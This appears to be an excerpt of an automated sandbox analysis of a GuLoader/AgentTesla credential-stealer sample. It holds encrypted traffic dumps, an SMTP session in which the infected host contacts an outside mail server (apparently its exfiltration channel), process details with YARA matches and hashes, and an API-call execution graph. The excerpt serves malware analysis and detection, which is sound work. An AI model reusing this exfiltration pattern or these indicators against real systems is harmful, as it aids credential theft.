                                                                                                                      2022-07-08 04:01:38 UTC200INData Raw: 2a f6 a8 1c 98 9b 1b 16 34 cf 71 49 ea 10 f8 9a b9 33 10 5d a3 51 8d 4c 8f d2 1e d6 32 c5 37 40 62 47 c3 b8 b2 79 b9 13 43 33 74 b8 fa 7e 15 18 a3 3d c8 a2 af 20 31 48 ea ed 5c 0e c8 c2 f2 39 a9 7b dc 45 36 ee 5c 19 8a 99 3a 69 ba 7c 2e c9 ed ff 2f de 94 fa 28 c5 e1 34 d8 6b 6d 9f 9f de 40 54 73 07 fd 30 15 74 e9 aa 37 bd 2e cc b7 61 27 e0 af b3 3d 74 83 b3 d3 96 7c 08 c8 7e c3 d5 fb 6e 41 d8 0b 42 4c a6 48 7d 3e 55 22 20 6f cd 48 ab 36 f8 d2 e3 dd 7c f1 f3 39 0c 10 2b 14 cd f6 6c c2 b7 41 79 55 68 27 ad 49 47 62 4f 00 d6 70 3e 2d 3a b1 c5 c3 e8 2d df 5d ff 1f 8c 9f ed d9 60 91 3e 0a 86 4d 08 ad 0b 70 96 bb 81 9c 0b 68 21 fa 06 79 88 9f c4 79 b9 98 53 24 a4 52 ee 99 e5 fd 0a 45 9b 67 d1 27 c3 dd 90 61 55 df 49 bb 86 75 48 2b 83 b4 8c 64 40 70 e3 28 ea e5
                                                                                                                      Data Ascii: *4qI3]QL27@bGyC3t~= 1H\9{E6\:i|./(4km@Ts0t7.a'=t|~nABLH}>U" oH6|9+lAyUh'IGbOp>-:-]`>Mph!yyS$REg'aUIuH+d@p(
                                                                                                                      2022-07-08 04:01:38 UTC201INData Raw: 95 ee f8 e4 95 f7 d9 3b bf 62 31 eb 57 6b 36 c4 22 db 9a 05 28 b3 1c 00 03 30 ff 41 3b 2b 9e ad bc 9b 3e 6a 78 e7 fa 0f 1e 28 a9 1e a1 c9 ef 78 2a 94 9e 91 e4 e3 03 3d 86 86 88 de 0b e3 35 e3 85 55 aa f8 94 7e 99 3f 53 5d 21 3a 9b 2c 54 b5 07 d7 1e 46 c8 c2 1d 30 ee 85 c4 1f e9 8a c1 cc 36 ce 3a e9 6e 07 96 0b 8f b5 2b 70 fc 87 42 48 5a 09 39 53 f8 9a d3 20 9a 09 d9 25 b4 27 52 99 6f ad de 54 83 47 97 ea 10 ba 34 d6 e8 c0 05 0b 37 10 16 f7 f8 b5 47 aa 4e 2c 83 db 98 f8 2f 5d 2a 71 44 b2 9c be 09 1a 7f ea 2c 81 02 44 53 b6 1a d9 54 7f d2 02 36 4b 9a 47 5f b4 7f 40 4d 0e ad 40 53 bc 68 ae ed c8 39 78 5d 25 73 5e fc 52 57 19 7f 43 bb 84 1e ba dc 91 b5 b8 c9 eb e7 4d 5a dd 37 9e f6 37 62 9d 34 ee 8a 95 c0 9a 26 bd f8 da 64 cd 97 77 6b 13 5c bf ac 21 fc d1 e0
                                                                                                                      Data Ascii: ;b1Wk6"(0A;+>jx(x*=5U~?S]!:,TF06:n+pBHZ9S %'RoTG47GN,/]*qD,DST6KG_@M@Sh9x]%s^RWCMZ77b4&dwk\!
                                                                                                                      2022-07-08 04:01:38 UTC203INData Raw: 84 c2 0c 52 9b aa db 44 3a e9 d7 b3 f2 0b 06 b5 19 b1 8a ab 13 2d bc 6c 27 38 a4 0a 0e 40 39 43 43 1a cc 27 c9 42 a5 92 93 a3 93 0b b6 4b 79 6d 0c 77 b9 9e 1f af ca 35 7d 0a 07 46 a3 25 33 07 24 70 d6 15 47 20 70 d0 b0 b4 2f d5 a5 45 b4 74 f6 f4 b6 37 99 e6 33 5f 63 98 1a 7e d3 1e e7 d6 f1 a0 c5 90 48 ff 4e 18 fd f8 99 1a cd 99 32 c1 79 03 a9 fa 86 85 68 b1 55 0d 92 4c b4 29 21 03 21 de 2f c1 80 12 2e 5e d2 f2 eb 0a 27 1a 96 26 9c 00 23 9d 1e 64 80 b4 0c 28 bd ac 1b 4c 1b 67 57 8b 71 86 05 5b 08 0e ca ad 81 67 88 63 a3 56 9d f7 0a 41 a2 6d b7 ed 34 9c d2 30 54 29 7c 60 e7 b7 6a 7f 92 d1 ae 18 63 e6 b1 16 b6 78 cd 9f 37 77 a4 a4 91 20 59 ad 05 94 1d c7 55 8b 84 8e 7a a3 34 d7 27 09 34 c3 b9 bd d2 d3 e3 4b 3c 08 db af 76 13 60 9e c5 88 3e dc de 10 b7 9a 34
                                                                                                                      Data Ascii: RD:-l'8@9CC'BKymw5}F%3$pG p/Et73_c~HN2yhUL)!!/.^'&#d(LgWq[gcVAm40T)|`jcx7w YUz4'4K<v`>4
                                                                                                                      2022-07-08 04:01:38 UTC204INData Raw: e3 24 15 3e 6c 7a 38 93 1b 64 4b ef 3f a7 26 db 50 6d ee 97 fc ba 32 e7 1f f0 96 6a c7 5b a8 22 4c 72 19 d1 9c 70 29 5a d2 af 23 0b 51 e2 2e 18 98 e5 d5 41 04 25 56 b9 fc 52 72 0a 9c e0 b1 76 10 34 c5 5f ad ac 8e 97 4d 59 2d 7a db 3f c2 14 25 26 8f 12 05 01 c4 0a 5b 5d ab 4f 17 2d 53 36 2b 8d 49 12 4b 05 26 d7 ed 5f d1 a1 f9 da d2 be bd 87 28 47 8a 4e e4 9a 59 0a f2 51 b8 ed ee dd f9 58 9d 9d a2 76 1c e7 0c 1a 76 31 83 7d 49 93 a4 97 d3 5d 9b b1 8f 54 2e 60 ee ab 8c dd bc 3a a4 b0 2a e1 87 19 b6 a9 f0 2b 02 b6 63 2d db 45 b0 ca ec f5 0f ee a6 91 6c cb 56 b2 bf d9 dc 4e 3f b1 9b 4d d4 5f 75 b8 ff 4b 2e c7 74 1f 7c 86 1f d3 02 cf 48 9e 93 53 a5 aa f0 dd b4 05 05 64 f6 93 36 a4 0d 23 11 91 f6 41 76 4b 7a a7 5d 4a fa 6b 52 fd be e1 b6 2d ad e5 5e 79 5e 57 91
                                                                                                                      Data Ascii: $>lz8dK?&Pm2j["Lrp)Z#Q.A%VRrv4_MY-z?%&[]O-S6+IK&_(GNYQXvv1}I]T.`:*+c-ElVN?M_uK.t|HSd6#AvKz]JkR-^y^W
                                                                                                                      2022-07-08 04:01:38 UTC205INData Raw: 9e 20 40 c1 8d 6e f4 8e b8 7e 30 d9 78 bc 42 a8 ac 97 05 33 ab 26 c1 a6 17 3f 2b cd 8c e7 1f a7 f5 86 a8 4c 8e 90 9e 1a 64 74 07 7f 1a b8 b2 86 e3 1b 6d 5c b6 7d 89 05 44 02 3c c4 a2 9b 6b 9b e5 61 4f b3 f2 22 42 b8 48 b0 ef 3b 83 4d 98 54 09 7f 73 e7 b7 67 78 94 c9 27 d1 6d ce b8 3d bf 6f c5 8b 2b ea 77 a2 83 50 42 b1 8b 47 12 d3 21 8d 8f 95 e8 e6 ed d2 23 00 2f 4a 71 a7 d5 c7 63 8a 27 9a 7e ac 56 10 74 86 ce 85 38 de dd 19 a4 99 3b 3c 5c 0e ab 96 2e f7 ce 0c 62 d0 b7 eb 2f d9 94 87 38 c0 e9 28 c9 3b 7f e5 61 7f 01 55 f4 d9 53 4b b9 ec 20 75 c3 3c 93 7d bb 89 fa 8e af 48 6e 33 ae f9 72 7e 56 03 e0 ae 48 82 27 5f 6f 37 2a 79 bc cf af 16 0d 42 94 cf 48 c7 ae 41 7b e9 4b 84 ca 9d 03 ab 4b c8 c8 83 61 0c 1d 29 b5 1a 71 d7 79 31 ed 9f 99 21 fb 51 4a 7f 15 77
                                                                                                                      Data Ascii: @n~0xB3&?+Ldtm\}D<kaO"BH;MTsgx'm=o+wPBG!#/Jqc'~Vt8;<\.b/8(;aUSK u<}Hn3r~VH'_o7*yBHA{KKa)qy1!QJw
                                                                                                                      2022-07-08 04:01:38 UTC206INData Raw: 7f d1 b7 a2 90 b5 53 87 57 d9 9f 56 97 e6 4b a2 ed fe 40 31 57 b5 bf a2 76 1e 23 16 9f bb 37 b1 fe 46 8d 24 5f d4 48 1b aa 07 f6 a4 6c c6 a3 98 5d 0f 3e 98 ad 29 f4 07 aa be b3 f4 3e 18 33 fb 2a f5 5b b4 c7 e2 ef 47 c4 a2 90 67 9b 2a de f5 bf da 5c bc 7a 86 68 d3 4f e6 2d fe 6f 2c d5 e4 1e 6b 03 58 dd 46 e7 4f 9f 8f 40 37 52 ea df b9 0a 1e f7 8e 86 1f b7 9f 3f 15 8b 7c 12 ec a5 62 a3 53 45 f5 ee c7 fb a9 60 ba 27 ad 52 98 4b 2b 5e 15 0c 14 c7 e8 69 7d 5d 9b 16 2f 96 61 8c 57 0e 74 72 24 c2 43 42 e3 c1 be 7a bd 5f ac 39 1a 03 3d 82 d4 c4 0e 5a 8e 4b 6e 09 d2 80 04 7a 66 d4 7a b7 c6 d7 40 58 4b b8 99 a8 a0 ab a6 9f 5c c8 6a 10 c1 51 94 09 51 e2 ed ce cf db 10 6b ab 8b 7f 8b a3 e9 9b 48 a2 9e d0 bb 0f 2c ed fd ab 2d 30 71 59 9c 54 47 13 92 c8 58 c1 32 89 ca
                                                                                                                      Data Ascii: SWVK@1Wv#7F$_Hl]>)>3*[Gg*\zhO-o,kXFO@7R?|bSE`'RK+^i}]/aWtr$CBz_9=ZKnzfz@XK\jQQkH,-0qYTGX2
                                                                                                                      2022-07-08 04:01:38 UTC208INData Raw: 13 c7 54 96 97 a9 f4 7b 20 cd 2a 1a 37 76 70 a0 df d8 ed 56 2b 95 0f a4 51 15 73 86 ce 91 2c ab c2 02 a4 80 2e 37 75 0e bd 8a b3 2f d2 1b 0b d9 bf eb 2a ca 93 86 20 c0 e6 41 c9 25 65 f9 7e 7c 05 44 77 05 50 76 be f3 37 1c c8 29 b4 73 ab 1b 62 8e af 49 7f 31 a0 ec 65 f4 b8 03 e0 af 47 07 c3 4a cf d9 28 62 2d a5 16 14 38 53 15 00 c9 38 3f 2f c5 cb 4f 96 48 7b 14 a4 48 c9 da 01 8b 1a ad ec bd 3a 7a d3 7e 57 7d 5f 9d 24 7c ba 59 6a 97 bb 01 0c d8 8b f9 7d d7 e2 9e 94 77 0d 52 a1 fd 77 f0 7b 2a ef 60 e9 aa 58 8c ad be 59 f1 cc ce fc 4d 93 a5 b2 87 ce 80 51 e8 66 a0 88 92 bb 9f f4 fe 50 7a 94 65 46 9b c0 ef 8d 75 ad 55 11 0d 22 b8 1a 04 7b df 55 2f ae a4 58 6f a1 32 cb 7b df 70 26 b4 80 5a 4a 9b 7c 25 79 9e 7e 72 80 73 b5 28 1a e2 7d d5 47 ca ce 39 bf 65 ea 24
                                                                                                                      Data Ascii: T{ *7vpV+Qs,.7u/* A%e~|DwPv7)sbI1eGJ(b-8S8?/OH{H:z~W}_$|Yj}wRw{*`XYMQfPzeFuU"{U/Xo2{p&ZJ|%y~rs(}G9e$
                                                                                                                      2022-07-08 04:01:38 UTC209INData Raw: ec c8 b9 0c 19 64 03 53 3e a4 0c b6 04 97 f0 41 83 aa 6f af 54 4b eb f6 c1 fb b5 f0 34 70 91 d7 4c 4c 4c cf 48 dd 0e 5a fc 60 67 d5 66 15 29 9e 76 1d 08 da 4b f4 36 d9 5f df 3b ce a2 f5 d3 43 c4 3f 16 03 27 0d d2 ca 69 d2 7a 4d 68 2d dd 80 19 66 fb 0a 73 b8 49 c2 56 57 c8 70 89 26 54 b8 28 4a 5b cf fa 98 2e 4c 86 01 7f fe fa 52 3a ca 63 5e bb 19 1e 63 b1 e8 1a 1e 92 8b 45 a3 0d a2 20 f4 a9 a2 28 66 5b 12 99 5b 18 96 dd d4 14 2f 93 43 05 5d 87 d1 d1 59 3e ef cb 37 95 06 1a ce 13 a5 0b a0 09 56 ba 73 2f 30 bb 05 1a 6b 3c 5e 56 09 4d e6 cf 50 26 9b 81 bf 06 94 32 91 79 6d f8 79 b4 9a 03 a9 da 27 f9 a1 08 45 5f 87 3d 15 ac d5 c4 95 42 23 6b d5 a3 d3 b2 4d a3 40 bd 76 e5 f4 ac aa 0a e9 45 50 ed 3f 28 ff 60 83 43 d0 e8 92 45 10 5b e1 4d 16 ee 7b 9f 0e 4c 90 2e
                                                                                                                      Data Ascii: dS>AoTK4pLLLHZ`gf)vK6_;C?'izMh-fsIVWp&T(J[.LR:c^cE (f[[/C]Y>7Vs/0k<^VMP&2ymy'E_=B#kM@vEP?(`CE[M{L.
                                                                                                                      2022-07-08 04:01:38 UTC210INData Raw: 95 86 5f 26 82 fe 43 8d 4d 3c 97 b1 11 96 f3 0a 0d f7 60 94 df 44 8d 27 ff d4 6f 18 aa 04 37 a4 6f c6 a2 98 5e ca 36 93 ab 27 f3 95 9a 65 b5 e7 a2 02 a6 51 ac 08 59 a7 48 e2 f5 cf 45 ba 9f 7b e6 2a c2 7d 1a c1 4b 20 b2 8d 5a 52 55 69 ea 82 47 33 c9 65 55 78 84 3f c6 45 d2 5f 1e 4f 53 a5 6b ea cf ac 8b d1 77 91 0f 37 ab 83 b0 04 97 ec d2 fe b0 07 a9 40 45 fa 6a 9e d1 bc ec a2 37 3f 0d 5c 4b df 47 80 ce 9c 06 f5 67 f4 5d b5 06 a7 2a 6a 8f 55 7a 57 7b 30 c5 d0 ca 30 c8 ad 7a b6 71 b3 2b 16 11 06 8b c8 cd 0e 5a ba 42 72 80 d2 9b 1e f4 a6 d6 7c bf da 4a 9e 44 5a 2c 80 34 5d b6 b4 99 48 5c 73 9e 3d 5e 94 01 63 96 ea 5f a6 39 17 45 a2 84 f1 70 3e f2 98 45 a1 82 75 b1 14 37 ef 75 66 22 32 f2 41 87 56 da cb 82 dd d5 c1 20 93 42 ac 5d 9b 5f 7e 56 ba e9 c4 b3 e7 7d
                                                                                                                      Data Ascii: _&CM<`D'o7o^6'eQYHE{*}K ZRUiG3eUx?E_OSkw7@Ej7?\KGg]*jUzW{00zq+ZBr|JDZ,4]H\s=^c_9Ep>Eu7uf"2AV B]_~V}
                                                                                                                      2022-07-08 04:01:38 UTC211INData Raw: 2d 51 f9 c0 d4 d8 ed 45 20 9a 8b a2 58 1c 6f ee d9 f8 36 ca d8 1a ac 8e b3 e8 7d 1c 3f 8c a0 3f dd 9e cb dd a2 6d 25 df ba 9c 34 c9 e6 b4 09 38 6a 64 6b 70 1a 56 f4 c5 54 79 3a e6 2f 04 df b5 d3 62 bc 89 fb 94 21 ab 6c 26 29 ec 65 f4 a0 1f 72 36 48 82 27 74 48 24 35 61 2d 90 1f 0e ac 49 9b c0 cd 3f ad 43 1f ea 5c 05 c0 85 88 c1 51 ca d9 f4 6b 10 93 e2 af bb 7b c7 eb b1 f3 90 e9 2b f9 5e 6c 6a 87 a4 94 f6 50 53 d8 6f 47 6a 63 80 d7 d1 52 a2 fc 97 e9 fc 81 e8 f2 c0 79 4b 1e 84 4e 5f f5 fe 4f e1 57 0e 6a 33 3c 46 71 48 48 ce bc 81 9d 27 5f f7 eb f0 97 8c 70 c4 2f cb e1 8e 72 bf 55 11 4d 09 ad 95 f8 6c 5a 8d 3c 3c c9 41 fa 5b ba 0b 7f c5 ec 2b b2 80 51 51 84 f2 ca 6a 0d f6 90 89 41 c2 27 99 03 6e c7 64 ed c1 3e 2d 0c 3f 2d 09 ae 63 67 24 01 47 80 57 7c 42 bb
                                                                                                                      Data Ascii: -QE Xo6}??m%48jdkpVTy:/b!l&)er6H'tH$5a-I?C\Qk{+^ljPSoGjcRyKN_OWj3<FqHH'_p/rUMlZ<<A[+QQjA'nd>-?-cg$GW|B
                                                                                                                      2022-07-08 04:01:38 UTC212INData Raw: 19 92 e2 57 eb b3 f3 cd 5b 4b e9 e0 de 76 7e f8 b0 31 bd db 41 51 56 52 84 5d 78 d3 e8 7f 69 5f b1 08 2f 8c 63 95 dd d3 51 71 23 c6 d0 aa 3a dd a1 f5 d7 55 b1 36 16 06 31 ac db da 17 ce 60 4e 7d 1d d2 8c 04 7c 67 df 6f a9 c0 d7 5f 58 54 b0 8a 20 46 ad ad 9f 54 d5 73 98 25 70 98 01 79 ed f5 49 20 c4 0b 45 b7 97 f7 6a b7 f3 9c 4c bd 89 4c b3 0d a0 7c f8 bd 36 32 f3 94 93 51 4b 95 4a cd 5a c7 21 86 c0 18 41 09 02 de 51 2a 62 10 b4 fb 06 00 b5 3b b7 9f ba 9b fe b3 7b 30 bb 6f 09 1c 5e 34 67 42 1a d8 29 4e 9f a6 86 9e 32 da 84 bc 42 5c 78 6d 64 bb 1f c3 a6 d1 3b 71 0e 14 d5 62 2e 3b 0f 24 69 d8 1c 42 25 78 d8 b9 a8 a7 40 be 4c 30 b7 fa f4 aa b1 11 e6 c6 90 e2 3c 04 eb 60 83 3f df f9 a3 c6 c4 57 f4 44 1e fc fb 85 9e 4c 96 23 61 d0 08 a8 ea 87 99 7b 2c d6 08 b5
                                                                                                                      Data Ascii: W[Kv~1AQVR]xi_/cQq#:U61`N}|go_XT FTs%pyI EjLL|62QKJZ!AQ*b;{0o^4gB)N2B\xmd;qb.;$iB%x@L0<`?WDL#a{,
                                                                                                                      2022-07-08 04:01:38 UTC213INData Raw: cd 4c ae cb f5 63 77 9d 83 bd 54 73 d5 6b 45 fd 82 9c 86 f8 b2 5e 6d 95 ab 81 b7 d0 fa d9 0f c6 0b 76 fc 57 6b 53 f6 7d f6 fb 10 28 9f 72 20 77 37 9e 4b 52 3e fb ec ce 29 5e 13 78 b2 95 7e 6c 6a c8 57 a1 ad 80 0b 42 c1 ec b2 96 a1 62 44 86 e9 e7 ac 72 a3 47 d7 e4 45 aa f6 ed 1b da 14 3d 4b 48 3a ef 2a 3a a4 7e be 6d 53 bc e9 5f 36 8a 93 c4 16 8c fe 9e 87 53 97 3a 9a 0b 43 c9 48 ea cd 2b 79 8c 8b 2c 77 2f 0e 72 60 81 ff 81 37 fd 39 b5 23 c7 2d 19 92 16 ad 93 35 f3 21 fe b6 64 ff 55 94 a3 95 7c 25 50 45 62 a8 bf 98 2e d5 03 4c f0 e6 fd e4 64 4c 53 14 37 a5 e8 8f 4e 0e 16 e2 61 ae 71 51 36 a9 51 d9 2d 7f 91 3c 58 4b fb 49 31 85 34 61 34 5b ef 6f 21 8e 18 b9 a4 f0 49 63 2f 05 38 4e 85 01 15 0f 0d 6e cb b4 5a 86 af 89 c7 b4 b0 d9 82 63 5a a1 52 9c 9f 3c 16 8a
                                                                                                                      Data Ascii: LcwTskE^mvWkS}(r w7KR>)^x~ljWBbDrGE=KH:*:~mS_6S:CH+y,w/r`79#-5!dU|%PEb.LdLS7NaqQ6Q-<XKI14a4[o!Ic/8NnZcZR<
                                                                                                                      2022-07-08 04:01:38 UTC215INData Raw: 4f a0 8c 51 b6 1f 22 fd f5 bb 23 20 73 49 92 44 5a 16 83 cf 54 c9 2e 81 c2 0d 53 89 df df 44 3b e1 d9 b6 f5 08 08 bb 1b b7 8a a8 1b 23 b2 6e 21 38 a6 0b 12 50 3b 47 43 1b cd 3b ce 42 a7 93 8f b1 13 86 b2 4c 78 7f 79 71 a9 9f 1e a7 d4 35 79 00 06 57 df 26 33 07 2c 74 d6 14 4a 2d 76 d0 b1 a6 af 48 ab 5d b3 7e f8 fa a4 b7 04 f4 46 4d e3 39 08 fe 72 03 e2 de ec b2 45 0d 55 fa 4a 18 fc fa 97 1c cd 98 20 41 d0 0d af fa 86 98 7a 31 c8 08 b2 4c a6 a9 90 07 21 df 2e cf 86 12 2d 5f dc fc e9 0d 27 18 97 28 8d 80 96 99 18 76 00 15 0b 08 bf be 9b ed 15 65 52 ab 73 87 0b 47 0a 21 ca aa 86 65 99 e3 62 4b 93 f3 2a 41 bf 68 b2 ed 35 92 cf 35 51 09 7e 6e e9 b9 6f 7f 92 c0 2e d9 67 c6 b0 18 b8 7d cd 9e 39 6a aa a3 91 24 57 a3 0b 9a 13 c1 55 8a 85 9c fa 66 3c d0 24 07 25 43
                                                                                                                      Data Ascii: OQ"# sIDZT.SD;#n!8P;GC;BLxyq5yW&3,tJ-vH]~FM9rEUJ Az1L!.-_'(veRsG!ebK*Ah55Q~no.g}9j$WUf<$%C


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 8, 2022 06:01:51.433058023 CEST | 587 | 49749 | 185.101.224.45 | 192.168.11.20 | 220-ehost4045.hostinet.com ESMTP Exim 4.94.2 #2 Fri, 08 Jul 2022 06:01:51 +0200
 | | | | | 220-We do not authorize the use of this system to transport unsolicited,
 | | | | | 220 and/or bulk e-mail.
Jul 8, 2022 06:01:51.433449030 CEST | 49749 | 587 | 192.168.11.20 | 185.101.224.45 | EHLO 536720
Jul 8, 2022 06:01:51.464891911 CEST | 587 | 49749 | 185.101.224.45 | 192.168.11.20 | 250-ehost4045.hostinet.com Hello 536720 [102.129.143.28]
 | | | | | 250-SIZE 52428800
 | | | | | 250-8BITMIME
 | | | | | 250-PIPELINING
 | | | | | 250-PIPE_CONNECT
 | | | | | 250-AUTH PLAIN LOGIN
 | | | | | 250-STARTTLS
 | | | | | 250 HELP
Jul 8, 2022 06:01:51.465188980 CEST | 49749 | 587 | 192.168.11.20 | 185.101.224.45 | STARTTLS
Jul 8, 2022 06:01:51.500355959 CEST | 587 | 49749 | 185.101.224.45 | 192.168.11.20 | 220 TLS go ahead

                                                                                                                      Target ID:0
                                                                                                                      Start time:06:00:58
                                                                                                                      Start date:08/07/2022
                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:471150 bytes
                                                                                                                      MD5 hash:6164A2F75A0C585D3256FAECAC344573
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      Target ID:3
                                                                                                                      Start time:06:01:19
                                                                                                                      Start date:08/07/2022
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
                                                                                                                      Imagebase:0x600000
                                                                                                                      File size:108664 bytes
                                                                                                                      MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate

                                                                                                                      Target ID:4
                                                                                                                      Start time:06:01:19
                                                                                                                      Start date:08/07/2022
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
                                                                                                                      Imagebase:0xfb0000
                                                                                                                      File size:108664 bytes
                                                                                                                      MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:moderate

                                                                                                                      Target ID:5
                                                                                                                      Start time:06:01:20
                                                                                                                      Start date:08/07/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff783f90000
                                                                                                                      File size:875008 bytes
                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:8.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:14%
                                                                                                                        Signature Coverage:25.5%
                                                                                                                        Total number of Nodes:1221
                                                                                                                        Total number of Limit Nodes:53
70b21868 9012->9014 9013->9012 9014->8927 9019 70b22840 9015->9019 9016 70b228db GlobalAlloc 9020 70b228fe 9016->9020 9017 70b228ee 9018 70b228f4 GlobalSize 9017->9018 9017->9020 9018->9020 9019->9016 9019->9017 9020->8952 9022 70b22e2e 9021->9022 9023 70b22e6e GlobalFree 9022->9023 9078 70b212bb GlobalAlloc 9024->9078 9026 70b226fa StringFromGUID2 9030 70b2265f 9026->9030 9027 70b2270b lstrcpynW 9027->9030 9028 70b226d8 MultiByteToWideChar 9028->9030 9029 70b22742 GlobalFree 9029->9030 9030->9026 9030->9027 9030->9028 9030->9029 9031 70b2271e wsprintfW 9030->9031 9032 70b22777 GlobalFree 9030->9032 9033 70b21312 2 API calls 9030->9033 9079 70b21381 9030->9079 9031->9030 9032->8940 9033->9030 9083 70b212bb GlobalAlloc 9035->9083 9037 70b21659 9038 70b21666 2 API calls 9037->9038 9039 70b21663 9038->9039 9040 70b21312 9039->9040 9041 70b21355 GlobalFree 9040->9041 9042 70b2131b GlobalAlloc lstrcpynW 9040->9042 9041->8946 9042->9041 9044 70b21672 wsprintfW 9043->9044 9045 70b2169f lstrcpyW 9043->9045 9048 70b216b8 9044->9048 9045->9048 9048->8953 9050 70b22626 9049->9050 9052 70b21931 9049->9052 9051 70b22642 GlobalFree 9050->9051 9050->9052 9051->9050 9052->8960 9052->8961 9054 70b21312 2 API calls 9053->9054 9055 70b215fe 9054->9055 9055->8954 9056->8966 9057->8987 9059 70b2164d 9058->9059 9059->8987 9066 70b212bb GlobalAlloc 9060->9066 9062 70b212db lstrcpynW 9062->8988 9063->8994 9064->8985 9065->8988 9066->9062 9068 70b21361 9067->9068 9069 70b212cc 2 API calls 9068->9069 9070 70b2137f 9069->9070 9070->9002 9072 70b227b2 VirtualAlloc 9071->9072 9073 70b22808 9071->9073 9072->9073 9073->9004 9075 70b22b4d 9074->9075 9076 70b22b52 GetLastError 9075->9076 9077 70b22b5d 9075->9077 9076->9077 9077->9009 9078->9030 9080 70b2138a 9079->9080 9081 70b213ac 9079->9081 9080->9081 9082 70b21390 lstrcpyW 9080->9082 9081->9030 9082->9081 9083->9037 9084 2ad4f37 9123 2ad30f0 9084->9123 9087 2ad30f0 5 API calls 9088 2ad4f65 9087->9088 9091 2ad4fb4 GetPEB 9088->9091 9100 2ac1b34 
9088->9100 9089 2ad31cd 9133 2ad3a08 GetPEB 9089->9133 9090 2ad3201 LoadLibraryA 9118 2ad3220 9090->9118 9094 2ad503f 9091->9094 9094->9100 9155 2ad5fda 9094->9155 9095 2ad31e3 9096 2ad3220 4 API calls 9095->9096 9098 2ad31f6 9096->9098 9098->9090 9099 2ad320b 9100->9089 9100->9090 9105 2ad2cdb 9100->9105 9101 2ad5091 9101->9099 9101->9100 9102 2ad59db 9101->9102 9104 2ac1ab9 9101->9104 9107 2ad54de 9101->9107 9102->9100 9103 2ad5ceb 9102->9103 9108 2ad5ab5 9102->9108 9103->9100 9106 2ad5dc7 9103->9106 9116 2ad335c 9104->9116 9109 2ad5fda NtProtectVirtualMemory 9106->9109 9107->9100 9107->9104 9113 2ad5950 9107->9113 9108->9100 9110 2ad5ce0 9108->9110 9109->9099 9111 2ad5fda NtProtectVirtualMemory 9110->9111 9112 2ad5ce6 9111->9112 9114 2ad5fda NtProtectVirtualMemory 9113->9114 9114->9099 9116->9104 9117 2ad3450 9116->9117 9145 2ad3487 9116->9145 9121 2ac1ab9 9118->9121 9119 2ad335c 9120 2ad3487 4 API calls 9119->9120 9120->9121 9121->9118 9121->9119 9122 2ad3450 9121->9122 9122->9099 9124 2ad31bd 9123->9124 9125 2ad31cd 9124->9125 9126 2ad3201 LoadLibraryA 9124->9126 9127 2ad3a08 4 API calls 9125->9127 9128 2ad3220 4 API calls 9126->9128 9129 2ad31e3 9127->9129 9132 2ad320b 9128->9132 9130 2ad3220 4 API calls 9129->9130 9131 2ad31f6 9130->9131 9131->9126 9132->9087 9134 2ad3a2c 9133->9134 9135 2ad3ae7 9134->9135 9137 2acbc81 9134->9137 9157 2ad3afe 9134->9157 9135->9095 9137->9095 9138 2ad3201 LoadLibraryA 9137->9138 9139 2ad3a08 2 API calls 9137->9139 9140 2ad3220 2 API calls 9138->9140 9141 2ad31e3 9139->9141 9144 2ad320b 9140->9144 9142 2ad3220 2 API calls 9141->9142 9143 2ad31f6 9142->9143 9143->9138 9144->9095 9146 2ac1b34 9145->9146 9147 2ad3201 LoadLibraryA 9146->9147 9148 2ad3a08 3 API calls 9146->9148 9154 2ad2cdb 9146->9154 9149 2ad3220 3 API calls 9147->9149 9150 2ad31e3 9148->9150 9153 2ad320b 9149->9153 9151 2ad3220 3 API calls 9150->9151 9152 2ad31f6 9151->9152 9152->9147 9153->9116 9154->9116 9156 2ad605e NtProtectVirtualMemory 9155->9156 9156->9101 
